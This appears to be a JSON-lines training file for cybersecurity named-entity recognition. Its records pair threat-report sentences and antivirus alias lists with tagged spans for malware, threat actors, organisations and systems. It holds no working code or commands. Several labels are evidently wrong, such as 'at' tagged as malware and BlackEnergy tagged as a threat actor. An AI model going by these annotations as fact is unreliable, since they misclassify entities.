{"text": "A backdoor also known as: Backdoor/W32.Mirleg.24544 Backdoor/Mirleg.a TROJ_LEMIR.KM Win.Trojan.Mirleg-1 Backdoor.Win32.Mirleg.a Trojan.Win32.Mirleg.dkdm Backdoor.Win32.Mirleg.24544 Backdoor.W32.Mirleg.a!c BackDoor.Mirshell Backdoor.Mirleg.Win32.3 TROJ_LEMIR.KM BehavesLike.Win32.VTFlooder.mc Trojan[Backdoor]/Win32.Mirleg Backdoor.Win32.Mirleg.a Backdoor:Win32/Mirle.A Backdoor.Mirleg Bck/Lmir.D Win32.Backdoor.Mirleg.Tbik Trojan.PSW.LMir!RFMQExC82yY Backdoor.Win32.EggDrop W32/BDoor.BCV!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005110", "source": "cyner2_train"}}
{"text": "We have named this tool BBSRAT.", "spans": {"MALWARE: tool BBSRAT.": [[19, 31]]}, "info": {"id": "cyner2_train_005111", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.VB.EV Heuristic.Crypted", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005112", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Farfli.20223 Win32.Trojan.Farfli.t W32/Trojan.LJSX-0343 Backdoor.Trojan BKDR_ZEGOST.SM44 Trojan.Win32.Dwn.dxihqn TrojWare.Win32.AntiAV.~D Trojan.DownLoader16.26781 Trojan.Farfli.Win32.30753 BKDR_ZEGOST.SM44 BehavesLike.Win32.Backdoor.kc BDS/Backdoor.davcs Trj/CI.A Trojan.Farfli!Hj4dzX9BZUM Trojan-PWS.Win32.Bjlog", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005114", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Hanove W32/Trojan.BLPJ-3540 Backdoor.Trojan Trojan-Dropper.Win32.Dapato.degm Trojan.Win32.Drop.ddlhu Trojan.MulDrop2.26538 BehavesLike.Win32.Trojan.fh TrojanDropper.Dapato.owp Trojan-Dropper.Win32.Dapato.degm Backdoor:Win32/Hanove.A Trojan/Win32.Hanove.C240436 Win32.Trojan-dropper.Dapato.Ebhb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005115", "source": "cyner2_train"}}
{"text": "Its name originates from the Arabic word maktub which means this is written or this is fate", "spans": {}, "info": {"id": "cyner2_train_005116", "source": "cyner2_train"}}
{"text": "In this version of Ursnif I have also encountered an internal peer-to-peer communication which could possibly add the ability for the sample to communicate with other Ursnif peers over the same network.", "spans": {"MALWARE: Ursnif": [[19, 25], [167, 173]]}, "info": {"id": "cyner2_train_005118", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DownloaderHC.Trojan Trojan-Ransom.Win32.FraudBlocker!O Trojan/VB.bn TROJ_RANSVB.SMA Win32.Trojan.WisdomEyes.16070401.9500.9983 W32/MalwareS.U TROJ_RANSVB.SMA Trojan-Ransom.Win32.Chameleon.gfl Trojan.Win32.Chameleon.edluzm Trojan.Win32.A.FraudBlocker.9216.A[UPX] Win32.Trojan.Chameleon.Phqb Trojan.Winlock.364 Trojan.FakeAV.Win32.150033 W32/Risk.WDRB-6022 Trojan.Chameleon.c TR/Ransom.VB.BN Trojan:Win32/SMSer.F Troj.Downloader.W32.Small.l5Bd Trojan-Ransom.Win32.Chameleon.gfl Trojan/Win32.Chameleon.C2304852 SScope.Trojan.Validium.va Trojan.FraudBlocker!3BdV5QfTi3g Trojan-Ransom.Win32.Fullscreen W32/LockScreen.CH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005119", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9993 Win32/Tnega.THZ BehavesLike.Win32.Downloader.hh PWS:Win32/Tibia.BB Trojan.Zusy.Elzob.D6208 Trojan/Win32.Scar.R8662", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005120", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Exploit/W32.CAN.28672 Exploit.CAN Trojan/Exploit.CAN.2002-0649.a TROJ_SQLEXP.A TROJ_SQLEXP.A Win.Trojan.Exploit-173 Exploit.Win32.CAN.2002-0649.a Exploit.Win32.CAN-2002-0649.gpav Trojan.Win32.Exploit.28672.A Exploit.W32.CAN.2002-0649.a!c Exploit.Sqlck Exploit.CAN.Win32.23 W32/Risk.DCEZ-2564 Exploit.CAN.g TR/Expl.CAN-2002-0649.A Trojan[Exploit]/Win32.CAN Exploit.Win32.CAN.2002-0649.a Exploit:Win32/CAN20020649.A Exploit.CAN Win32/Exploit.CAN-2002-0649.A Win32.Exploit.Can.Eeqq W32/ThcSQL.A!exploit Win32/Trojan.Exploit.96c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005121", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.Trojan Trojan.Win32.DownLoad3.evepic Win32.Trojan.Spy.Pgde Trojan.DownLoad3.47177 BehavesLike.Win32.Downloader.lm W32/Trojan.XTOU-1556 Trojan:Win32/Netfosor.A!dha Trojan/Win32.Netfosor.C1246582 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005122", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Deborm.AC@mm Worm.Win32.Deborm!O Worm.Deborm Win32.Deborm.AC@mm Win32.Trojan.WisdomEyes.16070401.9500.9895 W32.HLLW.Deborms Win.Downloader.88-1 Win32.Deborm.AC@mm Worm.Win32.Deborm.ac Win32.Deborm.AC@mm Trojan.Win32.Deborm.fvmw Worm.W32.Deborm!c Win32.Deborm.AC@mm Win32.HLLW.Deborm.27 BehavesLike.Win32.Downloader.nz BehavesLike.Win32.ExplorerHijack WORM/Deborm.AC Worm:Win32/Deborm.AC Win32.Deborm.E5BBB3 Worm.Win32.Deborm.ac Worm.Deborm Win32.Deborm.AC@mm Trj/CI.A Win32.Worm.Deborm.Pjxe", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005123", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.10163 Trojan.Barys.DE0C3 Win32/Tnega.CfKWaYC Trojan.Click2.60391 BehavesLike.Win32.Autorun.vc Trojan-Banker.Win32.Banker HackTool:Win32/Asoka.A Unwanted/Win32.HackTool.R76574", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005125", "source": "cyner2_train"}}
{"text": "Talos has identified an email-based attack targeting the energy sector, including nuclear power, that puts a new spin on the classic word document attachment phish.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "ORGANIZATION: the energy sector,": [[53, 71]], "ORGANIZATION: nuclear power,": [[82, 96]]}, "info": {"id": "cyner2_train_005126", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9926 Trojan-Downloader.Win32.Delf.koxi Trojan.Win32.Delf.eurqqv Trojan.Win32.Z.Delf.2321408 Downloader.Delf.Win32.55823 BehavesLike.Win32.Dropper.vh W32/Trojan.VVSX-7495 TR/Dldr.Delf.xofbe Trojan-Downloader.Win32.Delf.koxi Trj/GdSda.A Trojan-Downloader.Win32.Delf W32/Delf.CFW!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005127", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9963 W32.Mytob@mm Net-Worm.Win32.Mytob.bf W32.W.VBNA.tni6 TrojWare.Win32.TrojanDownloader.Delf.accr Win32.HLLM.MyDoom.based BehavesLike.Win32.Trojan.pc Net-Worm.Win32.Mytob Worm/Mytob.atd WORM/Mytob.MD Trojan/Win32.Rukap.C17970 Win32.Trojan.Hoster.Heur", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005128", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Small!O Win32.Trojan.WisdomEyes.16070401.9500.9996 Backdoor.Trojan BKDR_PUDORATE.A Win.Trojan.Pudorat-2 Trojan-Dropper.Win32.Small.ix Trojan.Win32.Pudorat.uvlp BackDoor.PudoRat Dropper.Small.Win32.205 BKDR_PUDORATE.A W32/Trojan.ATSN-3573 Backdoor/Pudorat.e BDS/Pudorat.E.Srv Trojan[Backdoor]/Win32.Pudorat Trojan.Graftor.Elzob.D2736 Trojan-Dropper.Win32.Small.ix Backdoor:Win32/Pudorat.E Trojan/Win32.Small.R102192 Backdoor.Pudorat Trojan.DR.Small!n8WI7XFkeRA Backdoor.Win32.Pudorat.G W32/Pudorat.E!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005130", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Katusha.Win32.25040 Win.Trojan.357100-1 Trojan.Win32.Abacab.zfokj BackDoor.Abacab.102 Trojan[Backdoor]/Win32.Revell Backdoor:Win32/Revell.1_02 Win32.Virus.Temcac.A@dam W32/Revll.102!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005131", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.TrodowsLTK.Trojan Trojan/Cosmu.atqv BehavesLike.Win32.AdwareRBlast.dm Trojan.Zusy.Elzob.D560E Trojan.Win32.A.Cosmu.83456[h] Dropper/Malware.253952.FL TrojanDropper:Win32/Blmoon.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005132", "source": "cyner2_train"}}
{"text": "DOC and XLS files with malicious macros", "spans": {"MALWARE: malicious macros": [[23, 39]]}, "info": {"id": "cyner2_train_005133", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropped:Trojan.Downloader.VU TrojanDownloader.Podcast Trojan/Downloader.Adload.ci Win32.Trojan.WisdomEyes.16070401.9500.9963 W32/Downloader.AIEZ TROJ_DLOADR.CH Win.Downloader.Adload-85 Dropped:Trojan.Downloader.VU Trojan-Downloader.Win32.Adload.amn Dropped:Trojan.Downloader.VU Trojan.Win32.Delf.epwf Trojan.Win32.Downloader.140800.D Dropped:Trojan.Downloader.VU TrojWare.Win32.TrojanDownloader.Adload.CI Dropped:Trojan.Downloader.VU Trojan.DownLoader6.4157 TROJ_DLOADR.CH BehavesLike.Win32.Fujacks.cc Downloader.Delphi W32/Downloader.RKBR-2696 TrojanDownloader.Adload.hk Adware.DollarRevenue TR/Drop.Start.abk.4 Trojan[Downloader]/Win32.Adload Trojan.Downloader.VU Troj.Downloader.W32.Adload.amn!c Trojan-Downloader.Win32.Adload.amn Trojan/Win32.Banload.R41470 Dropped:Trojan.Downloader.VU Trojan-Downloader.Win32.10213 Win32/TrojanDownloader.Adload.CI Win32.Trojan-downloader.Adload.Pkqr Trojan.DL.Adload!u3IAhoIxyiU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005134", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.FcodeNHc.Trojan Trojan.Dorv.S8319 Ransom.FileLocker Trojan.Foreign.Win32.9536 Ransom.FileLocker/Variant Trojan/Kryptik.aykk Win32.Trojan.Filecoder.u RANSOM_CRYPNAN_GA250444.UVPM Trojan.Win32.Encoder.egvznv Trojan-Ransom.Win32.FileCoder.nan Backdoor.Win32.Hlux.NAN Trojan.Encoder.217 RANSOM_CRYPNAN_GA250444.UVPM BehavesLike.Win32.PWSZbot.dh Trojan/Foreign.ewc Trojan[Ransom]/Win32.Foreign Ransom:Win32/Haperlock.A Trojan.Symmi.D4C7E Trojan/Win32.Foreign.R61679 BScope.Malware-Cryptor.Hlux Win32/Filecoder.NAN Trojan.Foreign!VfdOCZ5FB8A Trojan.Win32.Sisron Trj/Dtcontx.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005135", "source": "cyner2_train"}}
{"text": "This report contains indicators of compromise IOCs and technical details on the tactics, techniques, and procedures TTPs used by APT actors on compromised victims' networks.", "spans": {"THREAT_ACTOR: APT actors": [[129, 139]], "SYSTEM: victims' networks.": [[155, 173]]}, "info": {"id": "cyner2_train_005136", "source": "cyner2_train"}}
{"text": "List of PlugX Command And Control servers used to attack targets in Asia.", "spans": {"MALWARE: PlugX": [[8, 13]]}, "info": {"id": "cyner2_train_005137", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Chyopic!O Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_OGRAN.A Win.Trojan.Downloader-30022 Trojan.Win32.Chyopic.bksyf Trojan.Win32.S.Downloader.9984.A Backdoor.W32.Chyopic.bu!c Backdoor.Win32.Chyopic.A BackDoor.ClDdos.6 TROJ_OGRAN.A BehavesLike.Win32.FDoSBEnergy.zh TrojanDownloader.Ogran.j Trojan:Win32/Chcod.A Trojan[Backdoor]/Win32.Chyopic Trojan:Win32/Chcod.A Trojan/Win32.HDC.C33704 Trojan.Chcod!5jj9mkC/wqU Backdoor.Win32.Chyopic Win32/Backdoor.7b0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005138", "source": "cyner2_train"}}
{"text": "The customization doesn t end with the lure; the malware used in the campaigns is also targeted by region and vertical.", "spans": {"MALWARE: malware": [[49, 56]], "THREAT_ACTOR: campaigns": [[69, 78]]}, "info": {"id": "cyner2_train_005139", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Risktool.Flystudio.17330 DDOS_NITOL.SMD DDOS_NITOL.SMD Win.Trojan.7486152-1 Backdoor.Win32.Sethift.a Trojan.Win32.Spambot.wpwqo Trojan.Spambot.10932 BehavesLike.Win32.Downloader.qc Trojan.Win32.MicroFake Backdoor.Win32.Sethift.a Backdoor:Win32/Payduse.A!bit Trojan/Win32.PbBot.R11181 Trojan.Cosmu Trj/CI.A W32/Nitol.C Win32/Trojan.b7f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005140", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G W32.Virut.CF Win32/Virut.17408 PE_VIRUX.Q Win.Trojan.Virut-377 Virus.Win32.Virut.q Virus.Win32.Virut.hpeg Win32.Virut.5 Virus.Virut.Win32.1938 PE_VIRUX.Q BehavesLike.Win32.Ipamor.lh Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.cr.61440 Virus:Win32/Virut.BN W32.Virut.l5he Virus.Win32.Virut.q Win32/Virut.F Virus.Virut.13 Win32/Virut.NBP Backdoor.Win32.DsBot W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005141", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: Android.Trojan.FakeApp.FC Trojan:Fakebank.B Android.Trojan.FakeApp.FC HEUR:Trojan-Banker.AndroidOS.Asacub.ab A.H.Ste.Banker.B Android.BankBot.221.origin HEUR:Trojan-Banker.AndroidOS.Asacub.ab Android-Trojan/Banker.5d288 a.privacy.spiderbank Trojan-Banker.AndroidOS.RuBank Android/SpyBanker.HH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005142", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS.Win32.Banker.1!O Trojan/Kryptik.adfi Win32.Trojan.WisdomEyes.16070401.9500.9985 Infostealer.Bancos TROJ_BANKPTCH.SMA Trojan.PWS.Banker1.4670 TROJ_BANKPTCH.SMA Trojan-PWS.Win32.Banker Trojan/Menti.uci W32.Infostealer.Banker TR/Menti.A.2 Trojan/Win32.Unknown PWS:Win32/Banjori.A Trojan.Kazy.DFB0D TScope.Malware-Cryptor.SB W32/Krypt.CLE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005145", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PDF/Dropper.C!Camelot Bloodhound.PDF.24 PDF/Exploit.Pidief.PIT Heuristics.PDF.ObfuscatedNameObject Trojan.Script.ExpKit.esqnwi Exploit.PDF.Pidief.f Exploit.PDF.889 HEUR_PDFEXP.D BehavesLike.PDF.BadFile.dx PDF/Dropper.C EXP/Pidief.akc Exploit:Win32/Pdfdrop.D JS/SARS.S139 possible-Threat.PDF.Acmd VBS/BanLoader.BBAF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005146", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9772 Win32.Worm.Autorun.R Trojan.Win32.Inject.srauk Heur.Packed.Unknown Trojan/Jorik.bmit TrojanDownloader:Win32/Roker.A W32/Llac.SHV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005147", "source": "cyner2_train"}}
{"text": "And in an unusual reversal of typical bank phishing social engineering tactics, the phishing emails purport to be from the bank's customers.", "spans": {"ORGANIZATION: the bank's customers.": [[119, 140]]}, "info": {"id": "cyner2_train_005148", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.B01F Ransom_Troldesh.R011C0DB318 Win32.Trojan.WisdomEyes.16070401.9500.9997 Ransom_Troldesh.R011C0DB318 Trojan-Ransom.Win32.Shade.onr Troj.Ransom.W32.Shade!c Trojan.MulDrop7.59017 BehavesLike.Win32.ObfusRansom.dc TR/Injector.cjsif Ransom:Win32/Troldesh.A Trojan-Ransom.Win32.Shade.onr Trojan/Win32.Shade.R219897 TrojanRansom.Shade Ransom.Shade Trj/CI.A NSIS/Injector.YO Win32.Trojan.Shade.Szbw W32/Injector.YD!tr Win32/Trojan.Ransom.c29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005150", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ServicesIpripA.Trojan Trojan.Ripinip.C Backdoor/W32.Ripinip.20480.L Backdoor.Win32.Ripinip!O Backdoor.Ripinip.28625 Trojan.Ripinip.C Backdoor/Ripinip.eea Trojan.Ripinip.C Win32.Backdoor.Ripinip.b Backdoor.Ripinip BKDR_RIPNIP.SMIA Win.Trojan.Ripnip-3 Trojan.Ripinip.C Backdoor.Win32.Ripinip.eea Trojan.Ripinip.C Trojan.Win32.Ripinip.buwod Backdoor.Win32.A.Ripinip.20480 Trojan.Ripinip.C Backdoor.Win32.Ripinip.~eea Trojan.Ripinip.C Win32.HLLW.Autoruner.28406 BackDoor-EVC.a Backdoor.Win32.Ripinip BDS/Ripinip.BN Trojan[Backdoor]/Win32.Ripinip Backdoor:Win32/Ripinip.C Backdoor/Win32.Ripinip.R1964 Backdoor.Win32.Ripinip.eea Win32/Ripinip.AP BackDoor-EVC.a TScope.Malware-Cryptor.SB Backdoor.Win32.Rip.tji Backdoor.Win32.Ripinip.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005151", "source": "cyner2_train"}}
{"text": "Recently a new Carbanak attack campaign dubbed Digital Plagiarist was exposed where the group used weaponized office documents hosted on mirrored domains, in order to distribute malware.", "spans": {"THREAT_ACTOR: Carbanak attack campaign": [[15, 39]], "THREAT_ACTOR: Digital Plagiarist": [[47, 65]], "THREAT_ACTOR: group": [[88, 93]], "MALWARE: malware.": [[178, 186]]}, "info": {"id": "cyner2_train_005152", "source": "cyner2_train"}}
{"text": "For instance, Sphinx ZeuS has enhanced its capabilities because of the Olympics.", "spans": {"MALWARE: Sphinx ZeuS": [[14, 25]], "ORGANIZATION: Olympics.": [[71, 80]]}, "info": {"id": "cyner2_train_005153", "source": "cyner2_train"}}
{"text": "Like BlackEnergy, the malware used by the so-called Sandworm APT group also known as Quedagh, Potao is an example of targeted espionage malware directed mostly at targets in Ukraine and a number of other post-Soviet countries, including Russia, Georgia and Belarus.", "spans": {"THREAT_ACTOR: BlackEnergy,": [[5, 17]], "MALWARE: malware": [[22, 29]], "THREAT_ACTOR: Sandworm APT group": [[52, 70]], "THREAT_ACTOR: Quedagh,": [[85, 93]], "MALWARE: Potao": [[94, 99]], "MALWARE: targeted espionage malware": [[117, 143]], "MALWARE: at": [[160, 162]]}, "info": {"id": "cyner2_train_005154", "source": "cyner2_train"}}
{"text": "With their assistance, we have confirmed over 76 additional messages containing NSO exploit links.", "spans": {"MALWARE: NSO exploit links.": [[80, 98]]}, "info": {"id": "cyner2_train_005158", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.Downloader.W32.AutoIt Trojan.Win32.Pasta.ztb Trojan.DownLoader11.57616 Trojan.Strictor.DE515 Trojan/Win32.Inject Trojan.Pasta IM-Worm.Win32.Sohanad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005161", "source": "cyner2_train"}}
{"text": "This ransomware is developed using the Go programming language.", "spans": {"MALWARE: ransomware": [[5, 15]], "SYSTEM: the Go programming language.": [[35, 63]]}, "info": {"id": "cyner2_train_005162", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zusy.D3D963 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.PWS.Stealer.17779 BehavesLike.Win32.PUPXAG.fc Trojan.MSIL.gotl Trojan:MSIL/Elmb.A!bit Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005163", "source": "cyner2_train"}}
{"text": "Electronicfrontierfoundation.org was not the only domain involved in this attack.", "spans": {}, "info": {"id": "cyner2_train_005164", "source": "cyner2_train"}}
{"text": "ITG03 used several previously unreported malwares, including backdoor and PowerShell scripts suggesting continued ITG03 interest in exploiting SWIFT three years after its initial campaign in 2016.", "spans": {"THREAT_ACTOR: ITG03": [[0, 5], [114, 119]], "MALWARE: malwares,": [[41, 50]], "MALWARE: backdoor": [[61, 69]], "SYSTEM: PowerShell scripts": [[74, 92]], "VULNERABILITY: exploiting SWIFT": [[132, 148]], "THREAT_ACTOR: campaign": [[179, 187]]}, "info": {"id": "cyner2_train_005166", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Kelopol.A3 W32/Application.USPT-4138 Hacktool.Keylogger PWS:MSIL/Kelopol.B Trojan.Win32.KeyLogger.ctnnso Trojan.KeyLogger.14630 TSPY_KELOPOL.SM TR/Habbo.skdh Trojan.MSIL.Krypt.5 Trojan/Win32.Vapsup.R122716", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005168", "source": "cyner2_train"}}
{"text": "In 2015, many of these techniques and activities remain in use.", "spans": {}, "info": {"id": "cyner2_train_005169", "source": "cyner2_train"}}
{"text": "In today's article, AnyRun look at LimeRAT, a modular piece of malware designed to give attackers control over a victim's computer and use it for crypto-mining or DDoS attacks.", "spans": {"ORGANIZATION: AnyRun": [[20, 26]], "MALWARE: LimeRAT,": [[35, 43]], "MALWARE: modular piece of malware": [[46, 70]], "THREAT_ACTOR: attackers": [[88, 97]], "SYSTEM: victim's computer": [[113, 130]]}, "info": {"id": "cyner2_train_005170", "source": "cyner2_train"}}
{"text": "We have dubbed the groups latest campaign Digital Plagiarist for its signature practice of mirroring legitimate sites using Tenmaxs TelePort Pro and TelePort Ultra site mirroring software onto similarly named domains, on which the TelePort Crew would host and serve up malware laden Office documents.", "spans": {"THREAT_ACTOR: groups": [[19, 25]], "THREAT_ACTOR: campaign Digital Plagiarist": [[33, 60]], "MALWARE: Tenmaxs TelePort Pro": [[124, 144]], "MALWARE: TelePort Ultra site mirroring software": [[149, 187]], "THREAT_ACTOR: the TelePort Crew": [[227, 244]], "MALWARE: malware": [[269, 276]]}, "info": {"id": "cyner2_train_005172", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Kolweb!O Trojan.Lokrodem.25745 Trojan.Kolweb.Win32.139 Troj.W32.Kolweb.mBu8 Trojan/Kolweb.a Win32.Trojan.WisdomEyes.16070401.9500.9687 Adware.Margoc Win32/Startpage.SK Win.Trojan.Kolweb-96 Trojan.Win32.Kolweb.a Trojan.Win32.Kolweb.cxqwlv Trojan.Win32.A.Kolweb.224389[ASPack] Trojan.PWS.Mirka BehavesLike.Win32.Sality.fc Trojan/Kolweb.cm TR/Delf.CF.13 Trojan/Win32.Kolweb Trojan:Win32/Lokrodem.A.dll Trojan.Win32.Kolweb.a Trojan/Win32.Kolweb.C12167 Trojan.Kolweb Trojan.Graftor.D33DE Win32.Trojan.Kolweb.Edns Trojan.PWS.Delf!+6OEG1VoGF8 Win32/Trojan.f0c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005173", "source": "cyner2_train"}}
{"text": "In the case of Hancitor, it still seen as a favourite carrier of very much active malware families such as Pony and Vawtrak.", "spans": {"MALWARE: Hancitor,": [[15, 24]], "MALWARE: malware families": [[82, 98]], "MALWARE: Pony": [[107, 111]], "MALWARE: Vawtrak.": [[116, 124]]}, "info": {"id": "cyner2_train_005175", "source": "cyner2_train"}}
{"text": "We believe that the operators of the Bunitu botnet are selling access to infected proxy bots as a way to monetize their botnet.", "spans": {"MALWARE: Bunitu botnet": [[37, 50]], "VULNERABILITY: selling access": [[55, 69]], "MALWARE: botnet.": [[120, 127]]}, "info": {"id": "cyner2_train_005176", "source": "cyner2_train"}}
{"text": "In May 2018, ITG03 actors stole $10 million from the Banco de Chile.", "spans": {"THREAT_ACTOR: ITG03 actors": [[13, 25]], "ORGANIZATION: the Banco de Chile.": [[49, 68]]}, "info": {"id": "cyner2_train_005177", "source": "cyner2_train"}}
{"text": "Our telemetry shows that H-W0rm is one of the most active RATs we ve seen, with infections observed across virtually all enterprise verticals and geographies in which Fidelis Cybersecurity products are deployed.", "spans": {"MALWARE: H-W0rm": [[25, 31]], "MALWARE: RATs": [[58, 62]], "ORGANIZATION: enterprise": [[121, 131]], "ORGANIZATION: Fidelis Cybersecurity": [[167, 188]], "SYSTEM: products": [[189, 197]]}, "info": {"id": "cyner2_train_005178", "source": "cyner2_train"}}
{"text": "Its price starts around $2500 which is more than double the price of another recent entry to the market.", "spans": {}, "info": {"id": "cyner2_train_005179", "source": "cyner2_train"}}
{"text": "In April 2017 we started observing new rooting malware being distributed through the Google Play Store.", "spans": {"MALWARE: new rooting malware": [[35, 54]], "SYSTEM: the Google Play Store.": [[81, 103]]}, "info": {"id": "cyner2_train_005181", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan:MSIL/Ploprolo.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005183", "source": "cyner2_train"}}
{"text": "In order to infect the victims, the attackers distributed spear-phishing emails containing malicious word document, the email purported to have been sent from legitimate email ids.", "spans": {"THREAT_ACTOR: attackers": [[36, 45]], "MALWARE: malicious word document,": [[91, 115]]}, "info": {"id": "cyner2_train_005184", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MTSysAntiD.Worm Packed.Win32.Klone!O PWS-OnlineGames.es PE_MAGOVEL.A Win32.Virus.Induc.b W32/Induc.A Trojan.Packed.16 PE_MAGOVEL.A Win.Trojan.Packed-77 Virus.Win32.Induc.b Trojan.Win32.Downloader.85504.AX Backdoor.Win32.Delf.~DD Win32.HLLP.Lagic Backdoor.Hupigon.Win32.100099 BehavesLike.Win32.MultiPlug.nc W32/Induc.A Win32.Troj.Klone.ab.389660 W32.Induc.tnqE Virus.Win32.Induc.b PWS:Win32/Magovel.A Backdoor/Win32.Hupigon.C61571 Virus.Win32.Induc.c RiskWare.NakedPack Win32.Induc.A Backdoor.Rbot Virus.Win32.Viking.AV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005185", "source": "cyner2_train"}}
{"text": "We have seen this threat access online content, including:JDUDUIFIB.exe", "spans": {"MALWARE: threat": [[18, 24]]}, "info": {"id": "cyner2_train_005186", "source": "cyner2_train"}}
{"text": "A June 23 FireEye blog post titled Operation Clandestine Wolf discussed a cyber espionage group, known as APT3, that had been exploiting a zero-day vulnerability in Adobe Flash.", "spans": {"ORGANIZATION: FireEye": [[10, 17]], "THREAT_ACTOR: Operation Clandestine Wolf": [[35, 61]], "THREAT_ACTOR: cyber espionage group,": [[74, 96]], "THREAT_ACTOR: APT3,": [[106, 111]], "VULNERABILITY: zero-day vulnerability": [[139, 161]], "SYSTEM: Adobe Flash.": [[165, 177]]}, "info": {"id": "cyner2_train_005189", "source": "cyner2_train"}}
{"text": "We collected a list of hashes and the files corresponding to those hashes were then retrieved from VirusTotal for further analysis.", "spans": {"ORGANIZATION: VirusTotal": [[99, 109]]}, "info": {"id": "cyner2_train_005191", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VBKrypt Spyware.Pony Downloader.Ponik TSPY_HPFAREIT.SMB Trojan.Win32.VBKrypt.ymio Trojan.Win32.VBKrypt.evkxoj Trojan.VBKrypt.Win32.291698 BehavesLike.Win32.Fareit.ch Trojan.VBKrypt.cgbs TR/Dropper.VB.ocnhj Trojan.Win32.VBKrypt.ymio Trojan/Win32.VBKrypt.R213345 Trojan.VBKrypt Trj/GdSda.A Win32.Trojan.Vbkrypt.Amwf Trojan.VBKrypt!wORN5qK9fN4 Trojan.VB.Crypt W32/FareitVB.BEOK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005192", "source": "cyner2_train"}}
